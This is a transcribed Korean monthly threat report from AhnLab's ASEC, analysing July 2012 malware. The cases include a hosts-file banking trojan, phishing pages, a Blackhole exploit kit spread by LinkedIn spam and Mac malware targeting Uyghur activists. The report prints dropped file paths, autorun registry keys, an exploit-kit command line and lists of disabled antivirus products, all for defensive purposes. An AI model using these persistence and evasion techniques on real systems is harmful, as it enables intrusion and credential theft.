ASEC REPORT VOL 안랩월간보안보고서 이달의보안동향모바일악성코드이슈

Transcription

1 ASEC REPORT VOL 안랩월간보안보고서 이달의보안동향모바일악성코드이슈

2 CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴 ( 에서확인하실수있습니다. 이달의보안동향 악성코드동향 01. 악성코드통계 03-7월악성코드, 973만건 11.6% 감소 - 악성코드대표진단명감염보고최다 20-7월신종악성코드 - 7월악성코드유형, 트로이목마가최다 - 악성코드유형별감염보고전월비교 - 신종악성코드유형별분포 02. 악성코드이슈 07 - Banki 트로이목마의공습 - 구글코드를악용한악성코드유포 - 국외은행피싱메일 - 아래아한글취약점을악용한파일추가발견 - 링크드인스팸메일과결합된블랙홀웹익스플로잇툴킷 - BHO에등록되는온라인게임핵악성코드 - WinSocketA.dll 파일을이용하는온라인게임핵 - Cross-Platform 악성코드 - 위구르족을타깃으로한맥악성코드 03. 모바일악성코드이슈 17 - APT 공격과관련된안드로이드악성코드발견 - 스마트폰에도설치되는애드웨어 보안동향 01. 보안통계 20-7월마이크로소프트보안업데이트현황 02. 보안이슈 21 - DNS changer 감염으로인한인터넷접속장애주의 - BIND 9 취약점발견및업데이트권고 - 어느기업의데이터유출후, 고객에게보내진 보안패치 메일의비밀웹보안동향 01. 웹보안통계 24 - 웹사이트악성코드동향 - 월별악성코드배포 URL 차단건수 - 월별악성코드유형 - 월별악성코드가발견된도메인 - 월별악성코드가발견된 URL - 악성코드유형별배포수 - 악성코드배포순위 02. 웹보안이슈 년 7월침해사이트현황 - GongDa Pack의스크립트악성코드증가 - 해킹된동영상사이트를통한악성코드유포 - XML 코어서비스취약점악용으로온라인게임악성코드유포

3 3 01 악성코드동향 악성코드통계 7월악성코드, 973만건 11.6% 감소 ASEC이집계한바에따르면, 2012 년 7월에감염이보고된악성코드는 15,000,000 10,000,000 12,589, % +1,582,812 11,006, % -1,266,654 9,739, % 전체 973만 9943건인것으로나타났다. 이는지난달의 1100만 6597건에 5,000,000 비해 126만 6654건이감소한수치다 ([ 그림 1-1]). 이중에서가장많이보고된악성코드는 ASD.PREVENTION 이었으며, JS/Agent와 Textimage/ Autorun이그다음으로많이보고됐다. 또한 Adware/Win32.winagir, Trojan/Win32.pbbot, Dropper/ Win32.onlinegamehack, JS/Iframe, Win-Trojan/Downloader AO 등총 5건의악성코드가최다 20건목록에새로나타났다 ([ 표 1-1]) 그림 1-1 ] 월별악성코드감염보고건수변화추이 순위 등락 악성코드명 건수 비율 1 ASD.PREVENTION 557, % 2 JS/Agent 287, % 3 1 Textimage/Autorun 282, % 4 3 Trojan/Win32.adh 243, % 5 2 Trojan/Win32.Gen 241, % 6 1 Downloader/Win32.agent 195, % 7 11 Malware/Win32.suspicious 174, % 8 2 Trojan/Win32.bho 148, % 9 1 Adware/Win32.korad 127, % 10 NEW Adware/Win32.winagir 124, % 11 5 Malware/Win32.generic 119, % 12 NEW Trojan/Win32.pbbot 107, % 13 1 Java/Exploit 100, % 14 3 Trojan/Win32.sasfis 98, % 15 NEW Dropper/Win32.onlinegamehack 95, % 16 NEW JS/Iframe 95, % 17 3 RIPPER 90, % 18 5 Als/Bursted 84, % 19 2 Trojan/Win32.agent 82, % 20 NEW Win-Trojan/Downloader AO 70, % TOTAL 3,327, % 표 년 7월악성코드최다 20건 ( 감염보고, 악성코드명기준 )

4 4 악성코드대표진단명감염보고최다 20 [ 표 1-2] 는악성코드별변종을종합한악성코드대표진단명중가장많이보고된 20건을추린것이다 년 7월에는 Trojan/Win32가총 147 만 1731건으로가장빈번히보고된것으로조사됐다. ASD Prevention이 55만 7529건, Win-Trojan/Agent가 49만 5102건으로그뒤를이었다. 순위 등락 악성코드명 건수 비율 1 Trojan/Win32 1,471, % 2 3 ASD 557, % 3 3 Win-Trojan/Agent 495, % 4 2 Adware/Win32 413, % 5 2 Win-Adware/Korad 404, % 6 2 Downloader/Win32 373, % 7 1 Win-Trojan/Downloader 335, % 8 1 Malware/Win32 315, % 9 2 JS/Agent 290, % 10 Textimage/Autorun 282, % 11 1 Win-Trojan/Korad 279, % 12 1 Win-Trojan/Onlinegamehack 275, % 13 3 Dropper/Win32 183, % 14 1 Win-Dropper/Korad 153, % 15 1 Win32/Conficker 141, % 16 2 Win32/Virut 129, % 17 4 Backdoor/Win32 112, % 18 1 Win32/Kido 110, % 19 NEW Java/Exploit 100, % 20 NEW JS/Iframe 95, % TOTAL 6,521, % 표 1-2 악성코드대표진단명최다 20건 7월신종악성코드 7월의신종악성코드는 Win-Trojan/ Korad 가 4만 5253건으로전체의 9.2% 를차지했으며, Win- Adware/KorAd B가 4만 693건이보고됐다. 순위 악성코드명 건수 비율 1 Win-Trojan/Korad , % 2 Win-Adware/KorAd B 40, % 3 Win-Trojan/Korad , % 4 Win-Trojan/Korad , % 5 Win-Adware/KorAd Q 30, % 6 VBS/Ifame 28, % 7 Win-Adware/KorAd , % 8 Win-Trojan/Agent BC 26, % 9 Dropper/Korad , % 10 Win-Trojan/Korad , % 11 Win-Adware/KorAd T 22, % 12 Win-Adware/KorAd R 22, % 13 Win-Dropper/KorAd , % 14 Win-Trojan/Korad , % 15 Win-Trojan/Agent IS 16, % 16 Win-Trojan/Downloader , % 17 Win-Trojan/Swisyn J 15, % 18 Win-Trojan/Agent , % 19 Win-Adware/KorAd , % 20 JS/Shellocode 12, % TOTAL 494, % 표 1-3 7월신종악성코드최다 20건

5 5 7월악성코드유형, 트로이목마가최다 [ 그림 1-2] 는 2012년 7월한달동안안랩고객으로부터감염이보고된악성코드의유형별비율을집계한결과다. 트로이목마 (Trojan) 가 41.9% 로가장높은비율을나타냈고, 스크립트 (Script) 가 10.1%, 웜 (Worm) 이 6.8% 인것으로집계됐다. 그림 1-2 악성코드유형별비율 악성코드유형별감염보고전월비교 [ 그림 1-3] 은악성코드유형별감염비율을전월과비교한것이다. 트로이목마, 드롭퍼, 바이러스가전월에비해증가세를보였으며스크립트, 웜, 애드웨어, 스파이웨어는감소세를보였다. 다운로더, 애프케어계열은전월과동일한수준을유지하였다. 그림 년 6 월 vs. 7 월악성코드유형별비율

6 6 신종악성코드유형별분포 7월의신종악성코드를유형별로보면트로이목마가 58% 로가장많았고, 애드웨어가 23%, 드롭퍼가 8% 였다. 그림 1-4 신종악성코드유형별분포

7 7 02 악성코드동향 악성코드이슈 Banki 트로이목마의공습 Banki 트로이목마 ( 이하 Banki) 가발견된지난 5월중순이후로, 이악성코드의변종이다양한경로를통해서꾸준히유포되고있다. Banki 트로이목마와유사한형태의트로이목마는오래전부터간헐적으로유포되었으나그기능과구조가복잡하거나정교하진않았다. aax.exe는다른사이트 (dns01.***** aaa.com) 에서 Banki 트로이목마를다운로드및실행하는기능을가지고있으며개략적인구조는 [ 그림 1-6] 과같다. Banki 트로이목마의위험성은기능이나구조에있는것이아니다. 감염시호스트파일을수정함으로써사용자가국내온라인뱅킹사이트로접속을시도할때, 전문가도구분하기어려울정도로정교하게만들어진피싱사이트로접속을유도하는데있다. 지금까지발견된 Banki 트로이목마의유포경로를정리해보면아래와같다. 해킹된웹사이트 정상프로그램리패키징 인터넷방송프로그램리패키징 해킹된웹하드사이트프로그램리패키징 토렌트프로그램리패키징 웹하드사이트에서동영상파일로위장 구글코드 (Google Code) 사이트 ( downloads/list) 구글코드사이트를이용한유포는가장최근에발견된사례로 [ 그림 1-5] 와같다. 5월중순에처음발견된이래지금까지위와같은경로를통해유포된 Banki 트로이목마의구조와기능에는전혀변화가없었다. 그림 1-6 Banki의개략적인구조 Banki 트로이목마가감염된 PC의호스트파일을수정하는이유는단순하다. 보통은특정사이트에접속하기위해가장먼저사이트의주소를 DNS에질의하여해당사이트의정보를얻는것으로알고있다. 하지만, 사실은 DNS에질의하는과정을거치기전호스트파일에서접속하려는도메인과매핑되는 IP가존재하는지를검색하여존재한다면 DNS에질의하지않고호스트파일을참조하여특정사이트로접속한다. 따라서 Banki 트로이목마가 [ 그림 1-7] 과같이감염된 PC의호스트파일을수정하여특정도메인에매핑되는 IP를임의로설정하면감염된 PC는 DNS 질의를하지않고호스트파일에설정된주소, 즉피싱사이트로접속한다. 그림 1-5 구글코드사이트에서유포된 Banki 그림 1-7 Banki 에의해서변조된호스트파일

8 8 지금까지보고된피싱사이트들을분석해보면전문가들도구분하기힘들정도로정교하게제작된것을알수있다. 이로미루어볼때, 개인보다는전문그룹에서업무를분장해제작한것으로추정된다. 하지만 [ 그림 1-8] 과같이유심히살펴보면정상사이트와피싱사이트사이에는차이점이있다. 정상국민은행사이트는 http가아닌 https를이용한다 는것이다. 그림 1-8 국민은행피싱사이트 ( 위 ) 와정상사이트 ( 아래 ) 비교 <V3 제품군의진단명 > - Trojan/Win32.Banki ( ) - Dropper/Win32.Banki ( ) - Trojan/Win32.Scar ( ) 상관관계분석을실시한결과 1.exe(37,772바이트 ) 는 7월 22일 17시경최초유포되었다. 1 1.exe(37,772바이트 ) 파일이실행되면윈도우시스템폴더에다음과같이자신의복사본을생성한다. C:\WINDOWS\system32\WinHelp32.exe 또 Windows Help Systemg 라는서비스명으로다음의레지스트리키를생성하여시스템재부팅시자동실행하도록구성한다. HKLM\SYSTEM\ControlSet001\Services\WinHelp32t\ ImagePath "C:\WINDOWS\system32\WinHelp32.exe" 2 중국에위치한특정시스템으로접속을시도하지만, 분석당시에는정상적인접속이이루어지지않았다. 그러나 ASD의데이터베이스를통해네트워크접속로그를확인한결과 7월 22일 23시경에다음파일을다운로드하는명령을수행했다. 구글코드를악용한악성코드유포구글은사용자들의편의성을위해지메일 (Gmail), 구글리더 (Google Reader) 와구글닥스 (Google Docs) 등여러가지서비스를제공하고있다. 인터넷만연결되어있다면언제어디서든지구글서비스를이용해메일과웹사이트, 그리고문서등을열고작업할수있다. 또개발자들을위해서는, 프로그램개발과관련한소스코드와파일등을개발자들끼리공유할수있도록구글코드공간을마련했다. 이러한서비스들모두 24시간중단되지않는가용성과안정성을제공한다는점을악용하여구글코드에악성코드를업로드하여유포한사례가 7월 23일발견되었다. 구글코드를악성코드유포에악용한사례는이번이처음은아니다. 지난 7월 18일발견되었던개인금융정보탈취목적의 Banki 트로이목마역시구글코드를악용하였다. 이번에발견된구글코드를악용해유포되고있는악성코드들은 [ 그림 1-9] 와같이총 2개의파일이며 server. exe(58,368바이트 ) 와 1.exe(37,772바이트 ) 이다. 3 1.exe(37,772바이트 ) 는별도의드라이버파일 (.SYS) 을이용해, 후킹 (Hooking) 되어있는 SSDT(System Service Dispatch Table) 를강제로복구하여, 자신이보안제품에의해탐지되지않도록한다. 그외에공격자의도에따라다음의악의적인기능들을수행한다. 파일다운로드및실행운영체계및하드웨어정보수집 DoS(Denial of Service) 공격 4 1.exe(37,772바이트 ) 에의해다운로드되는 server.exe(58,368바이트 ) 가실행되면윈도우시스템폴더에다음파일이생성된다. C:\WINDOWS\system32\(6자리임의의문자 ).exe 또한 Remote Command Service 라는서비스명으로레지스트리키를생성하여시스템재부팅시자동실행하도록구성한다. HKLM\SYSTEM\ControlSet001\Services\rcmdsvc\ImagePath "C:\WINDOWS\system32\(6자리임의의문자 ).exe" 이와함께레지스트리특정키값을수정하여윈도우시스템에내장된방화벽을우회할수있도록설정한다. 5 server.exe(58,368바이트 ) 는 7월 23일 20시까지중국에위치한시스템에접속을시도하였으나분석당시에는정상적인접속이이루어지지않았다. 해당파일역시공격자의도에따라다음과같이일반적인백도어 (Backdoor) 와유사한다양한악의적인기능들을수행한다. 그림 1-9 구글코드를악용해유포중인악성코드들 ASD(AhnLab Smart Defense) 의데이터베이스를통해이악성코드들의 파일다운로드및실행운영체계및하드웨어정보수집키보드입력후킹

9 9 DoS(Denial of Service) 공격원격제어 해당파일을에디터로열어보면, [ 그림 1-12] 와같은일부난독화된코드가확인된다. ASD 데이터베이스를통해 1.exe(37,772바이트 ) 와 server.exe(58,368 바이트 ) 의정보들을분석하는과정에서 1.exe(37,772바이트 ) 가다수의국내웹사이트들에대한분산서비스거부 (Distributed Denial-of- Service) 공격을수행한것을확인하였다. 해당분산서비스거부공격의대상이되었던웹사이트들은웹하드서비스업체와소규모의류쇼핑몰이주를이루었다. 이러한정황으로볼때공격자는중국언더그라운드에서공유되는악성코드생성기를통해생성한악성코드들을구글코드에업로드한후취약한웹사이트나포털웹사이트의카페등을통해유포한것으로추정된다. 그림 1-12 난독화된일부코드첨부된파일의코드를확인해보면, 취약점을통해악성코드를다운로드하거나다른악성코드유포를위한페이지로연결되지는않는다. 다만, [ 그림 1-13] 과같이계정정보확인및변경을위한로그인페이지가확인된다. <V3 제품군의진단명 > - Win-Trojan/Agent KG - Backdoor/Win32.Yoddos 국외은행피싱메일 최근미국의대표적인은행가운데하나인웰스파고 (Wells Fargo) 은행과관련된피싱메일이발견되었다. 수신된메일은 [ 그림 1-10] 과같이 계정과관련하여, 임시로접근이차단되어첨부된파일을다운로드후차단해제및패스워드변경이필요하다 는내용을담고있으며첨부파일 (Wells Fargo Bank.htm) 을포함한다. 그림 1-13 피싱페이지 - 로그인 해당웹페이지는정상적인웰스파고은행의홈페이지로보이지만, [ 그림 1-14] 와같이웰스파고은행과관련이없는도메인으로부터페이지를가져온다. 그림 1-10 수신된메일내용 첨부된파일은 [ 그림 1-11] 과같으며, 사용자는메일내용과파일명만봤을때에는의심없이열어볼위험성이있다. 그림 1-14 피싱페이지연결패킷정보관련서버의위치는프랑스 (France) 로확인되며, 로그인정보입력후 [Sign On] 버튼을클릭하면다음과정이진행된다 ( 잘못된정보입력시에도다음과정이진행된다 ). 그림 1-11 첨부된파일 1. [ 그림 1-15] 와같이개인정보와메일계정정보를필수로입력하도록요구한다.

10 10 그림 1-18 정상적인웰스파고은행홈페이지 그림 1-15 피싱페이지 - 개인정보입력 2. 신용카드와관련된정보입력을요구한다. 해당페이지는사용자를속이기위해서띄우는정상페이지이며, [ 그림 1-17] 의인증완료메시지와함께입력된정보는 [ 그림 1-19] 와같이호주 (Australia) 에위치한특정서버로전송된다. 그림 1-19 입력된정보전송되는패킷정보 정상적인사이트의경우위와같이과도한개인정보의입력을요구하지않는다는것을명심하고, 추후발생할수있는보안위협에대해서도항상주의해야한다. 그림 1-16 피싱페이지 - 신용카드정보입력 <V3 제품군의진단명 > - JS/Agent(V3, ) 3. 정보입력과정이완료되면인증완료메시지를출력한다. 아래아한글취약점을악용한파일추가발견 ASEC에서는지속적으로발견되고있는아래아한글취약점을악용한악성코드감염사례들에대해소개해왔다. 6월 15일 - 아래아한글제로데이취약점을악용한악성코드유포 6월 26일 - 알려진아래아한글취약점을악용한악성코드유포 7월 5일 - 지속적으로발견되는취약한아래아한글파일유포 그림 1-17 피싱페이지 - 인증완료페이지 아래아한글의취약점을악용한파일이 7월 24일다시발견되었으며, 이번에발견된취약한파일은 [ 그림 1-20] 과같다. 4. 인증과정완료후, [Continue] 버튼을눌러계속진행하면 [ 그림 1-18] 과같이정상적인웰스파고은행공식홈페이지를띄운다. 그림 1-20 중국인의특성 이라는내용의취약한아래아한글파일

11 11 이파일은 [ 그림 1-21] 의구조를가지고있으며새로운제로데이 (Zero Day, 0-Day) 취약점은아니다. 해당취약점은 HncTextArt_ hplg에존재하는스택 (Stack) 의경계를체크하지않아발생하는버퍼오버플로우 (Buffer Overflow) 다. 이취약점은 2010년부터지속적으로악용그림 1-21 취약한아래아한글파일구조되어왔던것들중하나로, 한글과컴퓨터에서이미관련보안패치를제공하고있다. 링크드인스팸메일과결합된블랙홀웹익스플로잇툴킷 ASEC에서는 6월 5일웹익스플로잇툴킷 (Web Exploit Toolkit) 의일종인블랙홀 (Blackhole) 웹익스플로잇툴킷이스팸메일 (Spam Mail) 과결합되어유포되었다고밝힌바있다. 최근블랙홀웹익스플로잇툴킷과결합된스팸메일이다시발견됐으며, 이번에발견된스팸메일은사용자가많은유명소셜네트워크 (Social Network) 서비스인링크드인 (LinkedIn) 의초대메일로위장하여유포됐다. 해당블랙홀웹익스플로잇툴킷은 [ 그림 1-22] 와같이다양한취약점들을이용하고있으며감염된 PC에서사용자정보를탈취하는것이목적이다. 1 해당취약점이존재하는아래아한글을사용하는시스템에서취약한한글파일을열면사용자계정의임시폴더에 scvhost.exe(32,768바이트 ) 파일을생성한다. - C:\Documents and Settings\[ 사용자계정명 ]\Local Settings\Temp\scvhost.exe 2 이전에발견되었던아래아한글취약점을이용하여생성되는악성코드들과는달리, 다른파일들을추가생성하지는않고자신의복사본만을아래의경로에생성한다. - C:\Documents and Settings\Tester\ 시작메뉴 \ 프로그램 \ 시작프로그램 \AcroRd32Info[ 다수의공백 ]XXX.exe 3 생성된 scvhost.exe(32,768 바이트 ) 의복사본인 AcroRd32Info[ 다수의공백 ]XXX.exe(32,768바이트) 를윈도우시스템의 [ 시작프로그램 ] 폴더에생성하여시스템재부팅시에도자동실행되도록한다. 그림 1-22 링크드인초대메일로위장해유포된블랙홀웹익스플로잇툴킷링크드인의초대메일로위장하여유포된스팸메일은 [ 그림 1-23] 의형태를가지고있으며, [Accept] 부분은정상적인링크드인웹페이지로연결되는것이아니라중국에위치한특정시스템으로연결되도록구성되어있다. 4 미국에위치한특정시스템으로 SSL 통신을시도했으나분석당시에는정상적인접속이이루어지지않았다. 정상적으로접속되면공격자가의도하는다양한악의적인기능들을수행할것으로추정된다. 한글과컴퓨터에서이미보안패치를배포중이므로해당보안패치를설치하는것이악성코드감염을근본적으로차단하는방안이다. <V3 제품군의진단명 > - Exploit/Hwp.AccessViolation-SHE - Win-Trojan/Agent CEX <TrusWatcher 탐지명 > - Exploit/HWP.AccessViolation-SEH <ASD 2.0 MDP 엔진진단명 > - Dropper/MDP.Document(6) 그림 1-23 블랙홀웹익스플로잇툴킷웹페이지로연결되는링크드인초대메일

12 12 1. [Accept] 부분을클릭하면중국에위치한특정시스템으로접속되며, PC 사용자에게는 [ 그림 1-24] 의페이지를보여준다. 6. 어도비아크로뱃리더 (Adobe Acrobat Reader) 에존재하는알려진취약점을이용하는 PDF 파일을 [ 그림 1-28] 과같이다운로드하여실행한다. 그림 1-24 정상웹페이지로위장한블랙홀웹익스플로잇툴킷웹페이지 2. 실제해당웹페이지하단에는 [ 그림 1-25] 와같이다른러시아에위치한시스템으로연결되는자바스크립트코드가인코딩되어있다. 그림 1-25 인코딩되어추가된자바스크립트코드 3. 해당자바스크립트코드를디코딩하면 [ 그림 1-26] 과같은 iframe 으로처리된코드가나타난다. 사용자모르게러시아에위치한블랙홀웹익스플로잇툴킷이설치되어있는시스템으로연결하는기능을수행한다. 그림 1-26 인코딩된자바스크립트를디코딩한코드 4. 해당블랙홀웹익스플로잇툴킷에성공적으로연결하면웹브라우저에의해 CMD 명령으로윈도우미디어플레이어 (Windows Media Player) 취약점악용을시도한다. 그러나분석당시해당취약점은정상적으로동작하지않았다. C:\Program Files\Windows Media Player\wmplayer. exe" /open php?f=182b5 5. 다음으로자바 (JAVA) 와인터넷익스플로러 (Internet Explorer) 에존재하는알려진취약점을이용하기위한스크립트파일이실행된다. 그림 1-28 취약한어도비아크로뱃리더파일다운로드 7. 해당링크드인스팸메일을수신한 PC에위에서언급한 4개의취약점중하나라도존재하면동일한시스템에서 wpbt0.dll(127,648바이트 ) 를다운로드하여다음경로에생성한다. C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0. dll 8. 생성된 wpbt0.dll(127,648바이트 ) 는자신의복사본을아래경로에 KB exe(127,648바이트 ) 로복사한다. C:\Documents and Settings\Tester\Application Data\ KB exe 9. 감염된 PC의레지스트리에다음키값을생성하여 PC가재부팅할때마다자동실행되도록구성한다. HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run\ KB exe = C:\Documents and Settings\Tester\ Application Data\KB exe 10. 감염된 PC에서실행중인모든정상프로세스의스레드로자신의코드일부분을삽입한후다음의정보들을후킹한다. - 웹사이트접속정보 - FTP 시스템접속사용자계정과비밀번호정보 - POP3 이용프로그램사용자계정과비밀번호정보 - 웹폼변조 (Formgrabber) 및웹폼인젝션 (httpinjects) 으로웹사이트사용자계정과암호정보 11. 감염된 PC에서수집된정보들은 [ 그림 1-29] 와같이악성코드내부에하드코딩되어있는특정시스템으로인코딩하여전송한다. 그림 1-27 취약한자바파일을다운로드하는코드 그림 1-29 후킹한데이터를인코딩하여외부시스템으로전송

13 마지막으로감염된 PC 사용자에게는 [ 그림 1-30] 과같이연결을시도한웹페이지를보여주며정상적인접속이실패한것으로위장한다. wshtcipip.dll 백업파일 ) C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fUudieefd.dll( 악성 ) C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\9uJriJeUrw. dll( 악성 ) C:\WINDOWS\system32\wshtcpjx.dll( 정상, wshtcpip.dll) C:\WINDOWS\system32\wshtcpip.dll( 악성 ) 처음드롭된 sys 파일을보면, 기존의온라인게임핵악성코드와같이랜덤.sys 파일이름으로생성되고, 이파일은아래의 Anti-Virus 제품실행을방해한다. 그림 1-30 정상웹페이지로위장한블랙홀웹익스플로잇툴킷링크드인스팸메일과결합된블랙홀웹익스플로잇툴킷에서유포를시도한악성코드는기존에발견된온라인뱅킹정보탈취를목적으로하는제우스 (Zeus) 또는스파이아이 (SpyEye) 와유사한웹폼변조 (Formgrabber) 및웹폼인젝션 (httpinjects) 기능으로웹사이트사용자계정과암호정보를탈취할수있다. [ 공격대상 Anti-Virus 제품 ] AhnLab V3 & SiteGuard, ALYac, Naver Vaccine, Bit Defender, Kaspersky, Avast, ESET NOD32, McAfee, Sysmantec Notorn, AVG, Avira, MSE [ 그림 1-31] 은악성코드가실행되면서등록하는레지스트리정보이며, 이전의온라인게임핵류의악성코드와는다르게 BHO(Browser Helper Objects) 에등록하는것을확인할수있다. 이는악성코드유포자가의도하는대부분의웹사이트들에서사용자계정과비밀번호정보를탈취할수있으므로, 단순한스팸메일로생각되더라도송신자가불명확한메일에포함된웹사이트연결링크는클릭하지않도록주의한다. <V3 제품군의진단명 > - JS/Iframe - Packed/Win32.Krap - PDF/Exploit - JS/Exploit 그림 1-31 등록된레지스트리정보레지스트리정보를바탕으로 BHO를확인해보면, [ 그림 1-32] 와같이악성코드실행시생성되었던파일 (esetejx.dll) 이등록되어있는것을볼수있다. BHO에등록되는온라인게임핵악성코드오랜시간동안온라인게임핵악성코드유포가지속되는가운데, 최근기존의방식과다르게 BHO에등록, 실행되는악성코드가발견되었다. 이러한방식의악성코드는이전에도있었지만, 한동안발견되지않다가최근다시발견되었다. 이에따라해당악성코드에대해살펴보고어떻게조치를취해야할지알아보도록한다. 온라인게임핵악성코드는주로웹을통해유포되며해당악성코드테스트시, 다음과같은파일이생성된다. [ 드롭되는파일 ] C:\WINDOWS\system32\drivers\76df15d2.sys( 악성 ) C:\WINDOWS\system32\esetejx.dll( 악성 ) C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\A1.zip( 정상, ws2help.dll 백업파일 ) C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\B1.zip( 정상, 그림 1-32 BHO 로등록된 esetejx.dll 추가로생성된파일은이전의감염방식과동일하게 wshtcpip.dll 파일을이용하고있고 [ 그림 1-33] 은생성된 wshtcpip.dll 파일과 esetejx.dll

14 14 파일의속성이다. WinSocketA. dll 파일을이용하는온라인게임핵 온라인게임핵악성코드대부분은윈도우구성파일을교체하는방식을사용해왔다. 교체대상이되는파일은변하더라도, 기본적인형태는크게변하지않았다. 그러나이번에발견된온라인게임핵악성코드는윈도우구성파일을교체하는방식이아니라, 예전에사용되던 LSP(Layered Service Provider) 를이용한방식을다시사용하고있어사용자의주의가요구된다. 그림 1-33 악성파일정보 (wshtcpip.dll, esetejx.dll) 해당악성코드가실행될때의네트워크정보는 [ 그림 1-34] 와같다. 그림 1-34 네트워크연결정보예방이최선이겠지만, 이미악성코드에감염된상태라면안랩닷컴홈페이지에서최신버전의 v3_gamehackkill 전용백신으로치료가가능하다. 이번악성코드를유포하는데사용된취약점은이미다룬바있는 Microsoft XML Core Services 취약점 (CVE ) 이다. 해당취약점을통해악성코드가실행되면드롭퍼파일을다운로드하고, 이파일을사용자몰래실행한다. 그림 1-36 타사보안프로그램으로위장한드롭퍼파일이드롭퍼의파일정보를보면 [ 그림 1-36] 과같이타보안회사의파일로위장한것을볼수있다. 드롭퍼파일이실행되면아래와같은 2 개의파일이생성된다. 1) C:\WINDOWS[ 무작위7바이트 ].sys 해당파일은감염 PC에설치된보안프로그램의동작을방해하고강제로종료한다. 그러나 V3의자체보호기능을사용하면 [ 그림 1-37] 처럼악성코드가실행되는것을차단하므로사전에이런동작을예방할수있다. 이파일은 WinSocketA.dll 파일이생성되고드롭퍼가종료되기직전에삭제된다. 그림 1-37 V3 자체보호기능으로실행이차단된드롭퍼 그림 1-35 V3_gamehackkill 전용백신 ( ) 치료화면온라인게임핵악성코드는플래시, 자바취약점등을이용하여감염되므로보안업데이트는항상최신버전으로유지하는것이중요하다 ( 아래사이트참조 ). *Adobe Flash Player 업데이트 : *Adobe Reader : *Microsoft : ) *Java : <V3 제품군의진단명 > - Dropper/Win32.OnlineGameHack(AhnLab, ) - Dropper/Onlinegamehack (V3, ) 2) C:\WINDOWS\system32\WinSocketA.dll 온라인게임핵의대표적인감염증상은정상윈도우구성파일을다른이름으로백업해두고, 악성파일을정상파일과교체하여, 정상파일처럼보이게하는것이다. 그러나예외적으로정상파일을교체하는것이아니라악성파그림 1-38 파일버전, 제품, 회사, 경로정보만보면정상파일로속기일이자신을정상파일처럼위장쉬움하는경우도있다. WinSocketA.dll 파일이그러한데, [ 그림 1-38] 과같이윈도우구성파일인것처럼위장한다. WinSocketA.dll 파일은 ws2help.dll 파일로위장하고있는것을확인할수있다. 그러나 WinSocketA.dll 파일의진짜목적은 LSP(Layered

15 15 Service Provider) 에자신을추가하여네트워크로전달되는통신정보를가로챈후, 가로챈사용자의온라인계정정보를 HTTP 프로토콜을통해외부로유출시키는기능을수행하는것이다. 모든 LSP가유해하다고할수는없지만네트워크와연결되는경우시스템성능이저하될가능성이있다. 이렇게 LSP를사용한악성코드에감염된경우, 기존의악성코드와같은방법으로이를제거한다면인터넷이되지않거나심지어는부팅이되지않는등의심각한문제를초래할수있다. 그이유는 LSP는체인구조로이어져있어그연결고리가끊어지면네트워크통신자체가정상동작하지않기때문이다. 그림 1-40 로제타설치안내해당악성코드는콜롬비아에위치한동일한 IP를가진 C&C 서버로접속을시도한다. 그림 1-41 C&C 서버접속 2012년초에도맥악성코드에서 OS를체크하여 OS에따라제작된악성코드를감염시키는 Cross-Platform 형태의악성코드가발견됐다. <V3 제품군의진단명 > - Dropper/Win32.OnlineGameHack( ) - Trojan/Win32.KillAV( ) - Win-Trojan/Onlinegamehack AS( ) Cross-Platform 악성코드침해된콜롬비아운송사이트를통해악성코드가유포되었다. 침해된사이트에접속하면 JAR 파일이실행되고사용중인시스템의 OS를확인하여각 OS에해당하는악성코드를다운로드한후실행시킨다. [ 그림 1-39] 는감염시킬 OS를확인하는코드다. 그림 년초, 발견된악성코드감염시 OS 체크하는코드 아이폰 (iphone) 과아이패드 (ipad) 판매가늘면서맥사용자도꾸준하게늘고있다. 2012년 2분기애플의실적발표에따르면 400만대의맥제품이판매되었다. 아직윈도우 OS에비해사용자가적은편이지만꾸준한증가세를보이고있으며, 그에따라맥악성코드도증가하고있다. 따라서맥사용자들도맥전용보안제품사용을사용하도록권한다. <V3 제품군의진단명 > - Win-Trojan/Getshell.2048(V3, ) 위구르족을타깃으로한맥악성코드 그림 1-39 감염시킬 OS 를확인하는코드 맥 (Mac) 용악성코드는 IBM에서만든 PPC(PowerPC) 칩을사용하는맥제품에서동작한다. 인텔칩을사용하는맥제품은로제타 (Rosetta) 를설치하면실행이되긴하나그마저도 10.7(Lion) 이후부터는지원하지않는다. 따라서 10.7 이하버전에로제타를직접설치한버전에서만동작을하므로감염피해는적을것으로추정된다. 그림 1-43 위구르활동가사진 신장위구르자치구를중국에서독립하기위한분쟁이끊이지않는가

16 16 운데위구르활동가를타깃으로한공격으로의심되는메일이발견되었다. 해당악성코드는맥 OS X을감염시키기위해사회공학적기법을이용했다. 그림 1-47 생성되는파일 그림 1-48 com.apple.foleractionsxl.plist 파일정보 그림 1-49 com.apple.folderactionsxl.plist 파일내용 그림 1-44 위구르맥사용자타깃메일 첨부된 ZIP 파일을압축해제하면 [ 그림 1-45] 와같이위구르활동가사진과 app 실행파일이있다. 위구르활동가사진은수신자의의심을방지하기위한목적에불과하며실제해당 ZIP 파일의목적은 app 파일실행을유도하여정보를유출하는것이다. 또한, Finder에서 [ 모든파일확장자보기 ] 옵션을사용하지않고해당파일을살펴볼경우, matiriyal 파일은단순히문서나사진파일정도로오인될수있지만, 실제로는 app 실행파일이다. 그림 1-50 launched 파일감염된시스템은명령을전달받기위해 C&C 서버로접속을시도하며시스템및버전정보를수집하고프로세스를종료하는등의기능을수행한다. 그림 1-51 C&C 서버접속시도 그림 1-45 확장자보기미설정 ( 좌 ) / 설정 ( 우 ) 그림 1-52 remote shell open 그림 1-46 압축해제한첨부파일 matiriyal.app 파일을실행하면, 시스템부팅시자동실행을하기위해 /Library/com.apple.FolderActionsxl.plist 파일을생성한다. 실제실행파일은 /Library/ 경로에 matiriyal.app의복사본인 launched 파일명으로복사한다. 그림 1-53 시스템버전정보수집

